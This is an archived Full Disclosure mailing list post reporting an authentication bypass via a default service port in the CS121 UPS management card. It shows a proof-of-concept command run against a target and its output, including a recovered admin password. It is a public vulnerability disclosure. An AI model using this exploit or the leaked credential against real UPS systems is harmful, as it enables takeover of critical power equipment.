Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...

From: jkmac () Safe-mail net
Date: Thu, 15 May 2014 16:25:23 -0400
UPS Web/SNMP-Manager CS121 by Generex comes in with a default enabled "service"-port, that makes it possible to bypass 
any specified login for HTTP(s), snmp or telnet. 

CS121 is a widely used management card in ups systems from Legrand, Rittal, Eaton,  AEG, Masterguard....

Attached is a poc, found and proofed on Legrand ups with different firmware releases. If you are hardcore enough, you 
may also flash your own HyNetOS-firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

Attachment: upssearch-pl.txt
Description: 


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: